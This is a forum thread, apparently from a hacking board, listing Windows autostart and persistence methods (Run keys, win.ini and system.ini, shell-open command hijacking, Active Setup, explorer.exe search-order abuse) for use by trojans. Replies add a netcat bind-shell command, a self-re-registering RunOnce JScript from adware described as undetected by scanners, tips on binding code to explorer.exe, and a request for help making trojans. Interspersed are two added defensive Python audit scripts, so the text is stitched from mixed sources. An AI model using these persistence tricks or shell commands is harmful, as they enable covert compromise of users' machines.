Axl
All Known and Unknown Autostart Methods from TLSecurity.net

1. Autostart folder
Everything in here will restart.
C:\windows\start menu\programs\startup {english}
C:\windows\Menu Démarrer\Programmes\Démarrage {french}
This Autostart Directory is saved in
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Startup="C:\windows\start menu\programs\startup"
So it could be easily changed by any program.

2. Win.ini
[windows]
load=file.exe
run=file.exe

3. System.ini
[boot]
Shell=Explorer.exe file.exe

4. c:\windows\winstart.bat
Note: behaves like a usual BAT file. Used for copying or deleting specific files. Autostarts
every time.

5. Registry
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]

6. c:\windows\wininit.ini
Often used by setup programs: when the file exists it is run ONCE and then deleted by Windows.
Example (content of wininit.ini):
[Rename]
NUL=c:\windows\picture.exe
This example sends c:\windows\picture.exe to NUL, which means that it is deleted. This
requires no interactivity with the user and runs totally stealthily.

7. Autoexec.bat
Starts every time at DOS level.

8. Registry Shell Spawning
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*"

The key should have a value of "%1" %*; if this is changed to server.exe "%1" %*,
server.exe is executed EVERY TIME an exe/pif/com/bat/hta is executed.
Known as the Unknown Starting Method and is currently used by SubSeven.

9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.

9. Misc Information
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap]
@="Scrap object" "NeverShowExt"=""

The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS.
This means if you rename a file as "Girl.jpg.shs" it displays as "Girl.jpg" in all programs
including Explorer.
Your registry should be full of NeverShowExt keys; simply delete the key to get the real
extension to show up.

taken from illmob's site !!!
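An added example, not part of Axl's post or the TLSecurity list: a small Python audit that reads the win.ini, system.ini and wininit.ini entries described in points 2, 3 and 6 and reports anything that would start or touch a file at boot. The three file contents are constructed samples and the function names are my own.

```python
# Constructed sample contents (not from any real machine) for the three INI-style
# files the post lists; each carries one entry a defender would want to see.
WIN_INI = """[windows]
load=
run=c:\\windows\\file.exe
[Desktop]
Wallpaper=(None)
"""
SYSTEM_INI = """[boot]
shell=Explorer.exe file.exe
[386Enh]
device=*vmm
"""
WININIT_INI = """[Rename]
NUL=c:\\windows\\picture.exe
c:\\windows\\system\\new.dll=c:\\windows\\temp\\new.tmp
"""

def parse_ini(text):
    """Minimal INI reader: section name (lowercased) -> ordered list of (key, value).
    Duplicate keys and order are kept so nothing is silently collapsed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ';#':
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].lower()
            sections.setdefault(current, [])
        elif '=' in line and current is not None:
            key, value = (p.strip() for p in line.split('=', 1))
            sections[current].append((key, value))
    return sections

def audit_win_ini(text):
    """[windows] load= and run= are normally empty; anything listed starts with Windows."""
    return [(k, v) for k, v in parse_ini(text).get('windows', [])
            if k.lower() in ('load', 'run') and v]

def audit_system_ini(text):
    """[boot] shell= should be exactly Explorer.exe; return the value if anything was appended."""
    for k, v in parse_ini(text).get('boot', []):
        if k.lower() == 'shell' and v.lower() != 'explorer.exe':
            return v
    return None

def audit_wininit_ini(text):
    """[Rename] lines are destination=source moves applied at next boot; NUL= deletes the source."""
    return [('delete' if dest.upper() == 'NUL' else 'move', src, dest)
            for dest, src in parse_ini(text).get('rename', [])]
```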

10x man !!!
Barvaz88
10x man nice thing
dissolutions
Putting a Trojan as C:\explorer.exe will execute it every time the computer restarts.
biboupoki
very nice thanx
Kynroxes
tks Axl for the list in order to help
tks dissolutions I will test it later !
SlippyG
QUOTE (Axl @ Dec 8 2003, 09:05 PM)
All Known and Unknown Autostart Methods from TLSecurity.net

Does anyone else find it rather strange that any of these methods are
considered 'unknown' ? It is not exactly a very exhaustive list

Perhaps they mean that these are all the techniques 'known' to be in use
by existing malware examined by TLSecurity (rather than all the methods
available) Oh, + a few that they haven't seen used in malware but are
common sense.


I notice simple techniques such as exebinding to (or chain-executing of)
legitimate common executables and a whole heap of other registry locations
are missing from the list. Similarly, all of the techniques seem to be aimed at
running an ARBITRARY binary without writing any additional code... obviously,
code DESIGNED to autorun could use still more methods.

Maybe this should have been billed as 'Top 10 simplest methods of autorunning
any binary' rather than 'All ways to run auto-start an exe' which it so obviously
isn't.

Sorry if I seem a bit picky. Misinformation is a dangerous thing. I'd hate for
any fellow members to wrongly sound the 'all clear' simply because they had
checked all the startup methods in this short list.


SG
gman24
Edit:

This is different from dissolutions' post of c:\explorer.exe. If you patch it or replace this with a modified version it cannot be deleted. If it is deleted using the same methods to replace it, the user interface will fail to start. This is a modification to the interface, not just a file starting up.

The one I am talking about is located %systemroot%\explorer.exe, commonly the system root is C:\WINDOWS



QUOTE (SlippyG @ Dec 9 2003, 06:24 AM)
I notice simple techniques such as exebinding to (or chain-executing of)
legitimate common executables and a whole heap of other registry locations



That just reminded me of something.

If you file-bind to explorer.exe, use a "patch" program that after patching gets deleted, or just straight up replace it; it will start up every time. Explorer.exe is your user interface for Windows; if you want to play with it in assembly as I have, create a copy and have it replace it with the original before boot (be sure to back up as well in case you mess something up). You can't modify explorer.exe while Windows is running (you can inject the process with code though), so what you need to do is have it replaced on bootup. Play with autoexec.bat and config.sys.

You can also replace it manually by booting up in safe mode with command prompt and replacing the files.

There are also keys to load items with Internet Explorer or other browsers; since this is usually run within the day on most computers connected to the internet, it's sort of an autostart method.

Then there are always the programs that start up automatically that the keys are in places you would never expect.
PiXeL
Very good tute!!!
Thxxxxx
neoragexxx
thx for the useful info axl
batigoooal
good tutz thks for pasting this info from illmob website!
boshcash
guys there are other startup methods like the runas service and the active setup startup method used by the Beast trojan, and the policies way also used by the Beast trojan, and also putting a hex-edited version of explorer.exe and editing the registry to point to it as the default windows shell
saendler
very useful this info

big thx
LoCaliSe
good tutz thks
krackatoa
Try this program for viewing autostart information. I've used it regularly to track down trojan start methods without manually having to check each location:

I unleash just about every executable I find on boards like this to my sacrificial machine. It's always interesting to see who is trying to infect who.

Auto-start viewer:

http://www.diamondcs.com.au/downloads/asviewer.zip

Also take a look at sysinternals, they have a similar free tool

They are not all inclusive, but have a good amount of known start methods
Helloman
Woooow ,

this is even more than "interesting" or "useful".

This is awesome, not just the silly autostart folder or common methods.

Many ways not every admin will notice .

MxMx
yow peeps ..
does every file in c:\documents and settings\admin\start menu\programs\startup\
always start when the PC is starting up? and does it run without having it installed first?

Greetingsz
boshcash
This is admin dir , not allusers dir !
Xion
thx it is very good !
SkyRaVeR
th@nx 4 da nice methods.. knew all but one !
caligula
a good admin will see changes in win.ini
not?
ah is there any command as msconfig for win2kpro ??
plz contact me
skorpio
is it possible to apply to the exe one or more attributes?

For example execute an exe like nc.exe -L -p port -d -e cmd.exe

Is it possible with this method?

Sorry 4 my english and thx for the trick
boshcash
QUOTE (SlippyG @ Dec 9 2003, 06:24 AM)
QUOTE (Axl @ Dec 8 2003, 09:05 PM)
All Known and Unknown Autostart Methods from TLSecurity.net

Does anyone else find it rather strange that any of these methods are
considered 'unknown' ? It is not exactly a very exhaustive list

Perhaps they mean that these are all the techniques 'known' to be in use
by existing malware examined by TLSecurity (rather than all the methods
available) Oh, + a few that they haven't seen used in malware but are
common sense.


I notice simple techniques such as exebinding to (or chain-executing of)
legitimate common executables and a whole heap of other registry locations
are missing from the list. Similarly, all of the techniques seem to be aimed at
running an ARBITRARY binary without writing any additional code... obviously,
code DESIGNED to autorun could use still more methods.

Maybe this should have been billed as 'Top 10 simplest methods of autorunning
any binary' rather than 'All ways to run auto-start an exe' which it so obviously
isn't.

Sorry if I seem a bit picky. Misinformation is a dangerous thing. I'd hate for
any fellow members to wrongly sound the 'all clear' simply because they had
checked all the startup methods in this short list.


SG

i totally agree with u , there is lotzzz of ways to run a file using registry ..
blackP0ster
starting a file with using the registry is the best way in my opinion!
cause there are lots of n00b admins


black
Armani
thx very cool
thank you
t00sTr0nG
THX 4 this useful info!
THX
toostrong
wiley
useful indeed, thx for sharing those infos
caligula
big thx
Neo2k
Very nice post, I've learned some new methods, thx
X-FloppY
Thanks very nice job
VorteX
here are some other methods and some more info on the ones already listed:

All Known and (so called) Unknown Autostart Methods
1. Autostart folder
C:\windows\start menu\programs\startup {english}
C:\windows\Menu Démarrer\Programmes\Démarrage {french}
C:\windows\All Users\Menu Iniciar\Programas\Iniciar {Portuguese, Brazilian}
This Autostart Directory is saved in:
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
  Startup="C:\windows\start menu\programs\startup"
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
  Startup="C:\windows\start menu\programs\startup"
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders]
  "Common Startup"="C:\windows\start menu\programs\startup"
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders]
  "Common Startup"="C:\windows\start menu\programs\startup"
Setting it to anything other than C:\windows\start menu\programs\startup leads to execution of
ALL and EVERY executable inside the set directory.

2. Win.ini
[windows]
load=file.exe
run=file.exe

3. System.ini
[boot]
Shell=Explorer.exe file.exe

4. c:\windows\winstart.bat
Note: behaves like a usual BAT file. Used for copying or deleting specific files. Autostarts every time.

5. Registry
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
  "Whatever"="c:\runfolder\program.exe"
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
  "Whatever"="c:\runfolder\program.exe"
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  "Whatever"="c:\runfolder\program.exe"
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
  "Whatever"="c:\runfolder\program.exe"
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\000x]
  "RunMyApp"="||notepad.exe"
  The format is "DllFileName|FunctionName|CommandLineArguments" -or- "||command parameters".
  Applies to: Microsoft Windows 98, Windows 2000 Professional, Windows 2000 Server, Windows 2000 Advanced Server, Windows Millennium Edition.
  http://support.microsoft.com/support/kb/ar...s/Q232/5/09.ASP
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "Whatever"="c:\runfolder\program.exe"
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
  "Whatever"="c:\runfolder\program.exe"

6. c:\windows\wininit.ini
Often used by setup programs: when the file exists it is run ONCE and then deleted by Windows.
Example content of wininit.ini:
[Rename]
NUL=c:\windows\picture.exe
This example sends c:\windows\picture.exe to NUL, which means that it is being deleted. This
requires no interactivity with the user and runs totally stealthily.

7. Autoexec.bat
Starts every time at DOS level.

8. Registry Shell Spawning
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="%1" %*
[HKEY_CLASSES_ROOT\piffile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="%1" %*
The key should have a value of <"%1" %*>; if this is changed to <server.exe "%1" %*>, then
server.exe is executed EVERY TIME an exe/pif/com/bat/hta is executed.
Known as the Unknown Starting Method and is currently used by SubSeven.

9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.

10. Explorer start-up
Windows 95, 98, ME
Explorer.exe is started through a system.ini entry; the entry itself contains no path information, so if
c:\explorer.exe exists it will be started instead of c:\$winpath\explorer.exe.
Windows NT/2000
The Windows Shell is the familiar desktop that's used for interacting with Windows. During system
startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, to
determine the name of the executable that should be loaded as the Shell.
By default, this value specifies Explorer.exe.
The problem has to do with the search order that occurs when system startup is in process.
Whenever a registry entry specifies the name of a code module, but does it using a relative path,
Windows initiates a search process to find the code. The search order is as follows:
- Search the current directory.
- If the code isn't found, search the directories specified in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path, in the order in which they are specified.
- If the code isn't found, search the directories specified in HKEY_CURRENT_USER\Environment\Path, in the order in which they are specified.
More info: http://www.microsoft.com/technet/security/...in/fq00-052.asp
Patch: http://www.microsoft.com/technet/support/kb.asp?ID=269049
General:
If a trojan installs itself as c:\explorer no run keys or other start-up entries are needed. If c:\explorer.exe
is a corrupted file the user will be locked out of the system. Affects all Windows versions as of
today.

11. Active-X Component
- HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName
  StubPath=C:\PathToFile\Filename.exe
Believe it or not, this does start filename.exe BEFORE the shell and any other program normally
started over the Run Keys.
Misc Information
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] @="Scrap object"
"NeverShowExt"=""
The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS. This
means if you rename a file as "Girl.jpg.shs" it displays as "Girl.jpg" in all programs including Explorer.
Your registry should be full of NeverShowExt keys, simply delete the key to get the real extension to
show up.
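An added example, not VorteX's code or anything from TLSecurity: a Python audit of a .reg export that walks the locations listed above and checks the shell-spawning baseline from point 8, the RunOnceEx value format from point 5, the Active Setup StubPath from point 11 and the Winlogon Shell from point 10. The .reg text, the GUID-shaped key name and the function names are constructed for the example.

```python
import re

# Constructed .reg export (not from any real machine) covering the locations the
# post lists; the batfile command is deliberately off-baseline so it gets flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="server.exe \"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="c:\\runfolder\\program.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001]
"RunMyApp"="||notepad.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{CONSTRUCTED-GUID}]
"StubPath"="C:\\PathToFile\\Filename.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
'''

SHELL_OPEN = re.compile(r'\\(exe|com|bat|hta|pif)file\\shell\\open\\command$', re.I)
RUN_KEYS = re.compile(r'\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)$', re.I)
RUN_ONCE_EX = re.compile(r'\\CurrentVersion\\RunOnceEx\\[^\\]+$', re.I)
ACTIVE_SETUP = re.compile(r'\\Active Setup\\Installed Components\\[^\\]+$', re.I)
WINLOGON = re.compile(r'\\Windows NT\\CurrentVersion\\Winlogon$', re.I)

def parse_reg(text):
    """Map key path -> {value name: string data}; '@' is the (Default) value."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and '=' in line:
            name, data = line.split('=', 1)
            name = '@' if name == '@' else name.strip('"')
            if data.startswith('"') and data.endswith('"'):  # REG_SZ only; unescape \\ and \"
                keys[current][name] = re.sub(r'\\(["\\])', r'\1', data[1:-1])
    return keys

def audit(keys):
    """Return (key, value name, data, reason) for every autostart-relevant entry."""
    findings = []
    for key, values in keys.items():
        if SHELL_OPEN.search(key):
            if values.get('@') != '"%1" %*':   # the clean value the post gives
                findings.append((key, '@', values.get('@'), 'shell spawning: default value altered'))
        elif RUN_KEYS.search(key) or ACTIVE_SETUP.search(key):
            findings.extend((key, n, d, 'autostart entry') for n, d in values.items())
        elif RUN_ONCE_EX.search(key):
            for n, d in values.items():   # "Dll|Function|Args" or "||command parameters"
                how = 'runs command' if d.startswith('||') else 'loads DLL and calls export'
                findings.append((key, n, d, 'RunOnceEx: ' + how))
        elif WINLOGON.search(key) and values.get('Shell', 'Explorer.exe').lower() != 'explorer.exe':
            findings.append((key, 'Shell', values['Shell'], 'Winlogon shell is not Explorer.exe'))
    return findings
```

Run it over `reg export` output of the hives in question; everything the audit returns is something to explain, not necessarily something malicious.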
jubbly
Some very nice info there. Thanks loads for sharing the info.
Divx_dude
good work this will come in very handy


greetz sorry for bad english!
daTh0r
yes nice infos
thx 4 sharing but i think the autoexec.bat only works with win98 and lower
trunks
great info will come handy. i been using firedaemon for few months however its been giving some trouble lately with xp sp1. The info provided in past posts will be very useful
thanks
ellitio
thanks for the info Axl!
JDog45
Nice little tut there. Thanks for taking the time to post it...
r00tless
Thanks for great info.

A great tutorial for programmers!
Progressor
Thank you for a good info
aTahualPa
QUOTE (r00tless @ Dec 26 2003, 12:25 AM)
Thanks for great info.

A great tutorial for programmers!

and hackers

but really good, I'll use it right now

aTa
Feanor
thanks man, this was very useful information.
FiNaLBeTa
here is a nice way to service a tool.
it won't show up in msconfig, cuz it always runs once.


make a file : "NAMEOFTHISFILE.js"
CODE
// Windows Script Host JScript, as posted (taken from an adware sample, see below).
var fso = new ActiveXObject("Scripting.FileSystemObject");
// GetSpecialFolder(0) is the Windows folder; the script expects to live there.
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\NAMEOFTHISFILE.js";
var Shell = new ActiveXObject("WScript.Shell");
// Re-registers itself under HKLM RunOnce on every run. Windows removes a RunOnce
// value as it executes it, which is why the entry never shows up in msconfig.
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc", filepath);
// 'url' is never defined in the posted snippet, so this line throws as written.
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", url);


every time Windows starts, the file will run itself, and sets itself to run on the next startup.
by adding one line, you can let some other program start itself up too.
(code taken from an adware on my system.)

undetected by antivirus and spyware scanners.

Greetz
tstngry
I was wondering is there a way to write to the win.ini or the autoexec.bat file through a batch file? This would be useful in making simple trojans. THNX
esorone
Great post m8,

Love the scriptz..Esorone
Jackson
thanx for that nice information
tomer_shim
tnx. very good post!
Cow|
Thankx for the info dude nice work
jockel
Big thanx 4 this information, i've been looking a long time for it...
LittleHacker
Well a good Topic!
But something important is missed !

if an EXE file is defined as a virtual file type with a CLSID in the Registry then running each exe file runs our trojan
But our trojan must accept a parameter and run that by the exec API function
Namelessname00
thanks man for the list! it will definitely help me out a lot!

*puts this post into his favorites*

Keep up the good work